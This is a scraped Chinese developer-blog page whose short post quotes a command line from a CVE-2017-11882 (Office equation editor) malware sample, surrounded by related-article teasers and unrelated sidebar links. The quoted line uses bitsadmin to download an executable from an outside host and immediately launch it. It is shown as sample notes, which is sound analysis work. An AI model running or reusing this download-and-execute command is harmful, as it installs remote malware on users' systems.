文档章节

cmd bat 下载并运行文件,来自cve-11882漏洞样本,eqnedit32.exe栈溢出

simpower
 simpower
发布于 08/15 13:11
字数 56
阅读 5
收藏 0

cmd.exe /c bitsadmin /transfer eH /priority foreground http://holdthatpaper33.com/abu_output774B940.exe %USERPROFILE%\cXUAQSZZXXCXzx.exe && start %USERPROFILE%\cXUAQSZZXXCXzx.exe

© 著作权归作者所有

共有 人打赏支持
simpower
粉丝 24
博文 536
码字总数 38046
作品 0
海淀
程序员
Office漏洞袭来(CVE-2018-0802)详细分析

  在windows2017年 11月份发布补丁,修复了包括cve-2017-11882在内之后,在2018年又继续发布补丁,修复了包括CVE-2018-0802在内的多个漏洞,而这次CVE-2018-0802再一次利用了EQNEDT32.EXE公...

FreeBuf
01/23
0
0
Office公式编辑器漏洞二代的原理分析、利用与防护方案

  在上周二(2018年1月9日)的微软例行更新中,微软再一次对Office中的公式编辑器3.0产生的多个内存破坏漏洞进行了修补,并将这一系列漏洞归类于编号CVE-2018-0802。   漏洞披露后,金睛安...

FreeBuf
01/20
0
0
一个二进制POC的诞生之旅CVE-2018-0802

  *本文作者:GeekOnline,本文属 FreeBuf 原创奖励计划,未经许可禁止转载。   背景   在潜伏17年的“噩梦公式”漏洞(CVE-2017-11882)被曝光修补之后,之前的漏洞程序EQNEDT32.EXE在w...

FreeBuf
01/22
0
0
样本分析 | CVE-2017-11882、CVE-2018-0802漏洞组合远控木马

封面 前言 看到腾讯电脑管家在freebuf上发了一篇《NDAY漏洞CVE-2017-11882与0Day漏洞CVE-2018-0802漏洞组合传播远控木马的样本分析》,觉得这个样本很有学习意义。就根据这个样本,梳理了下相...

皆明
01/27
0
0
cve-0158,0199,8759,11882,11935

0158栈溢出 0199远程地址自动下载执行 8759 属于代码注入,虽然可以像0199一样利用,但是跟office无关,跟.net有关 CVE8759,该漏洞在.net库中的SOAP WSDL 解析模块IsValidUrl函数没有正确处...

simpower
08/03
0
0

没有更多内容

加载失败,请刷新页面

加载更多

Bytom资产发行与部署合约教程

比原项目仓库: Github地址:https://github.com/Bytom/bytom Gitee地址:https://gitee.com/BytomBlockchain/bytom 发行资产 在比原链上发行资产比较方便快捷,使用节点的dashboard图形界面...

比原链Bytom
13分钟前
0
0
Ext ComboBox 实现下拉多选,全选,反选

Ext ComboBox下拉选中-全选反选逻辑处理 Ext ComboBox 实现下拉多选,全选,反选 方法一: 代码 var me = this;var isMultiSelect = true;//是否设置为下拉多选me.selectValues = [];//保存...

javaART
15分钟前
0
0
Swoole Windows 版(4.2.1)

https://pan.baidu.com/s/1uTm77_cp4kn0_xMgO1DpIw Swoole Windows 版(内部版本,swoole-4.2.1,php-7.1,必须为64位系统,Win7或更高版本)。 解压后,将 $dir/bin 目录,设置到 系统的环境...

老查
18分钟前
0
0
美团点评上市受追捧,成中国第四大互联网企业

从建立到上市,蔚来用了不到4年,拼多多3年,趣头条更是仅用了2年3个月。在这波中概股上市浪潮中,等待了漫长8年的美团点评也终于迎来登陆资本市场的时刻。20日上午,美团创始人兼CEO王兴终于...

Mr_zebra
19分钟前
0
0
Mysql-mybatis批量插入

话不多说直接上代码吧 <insert id="batchSave" >insert into table_name (`name`,age)values<foreach collection="list" index="index" item="item" open="(" separator="," close=......

落叶清风
24分钟前
0
0

没有更多内容

加载失败,请刷新页面

加载更多

返回顶部
顶部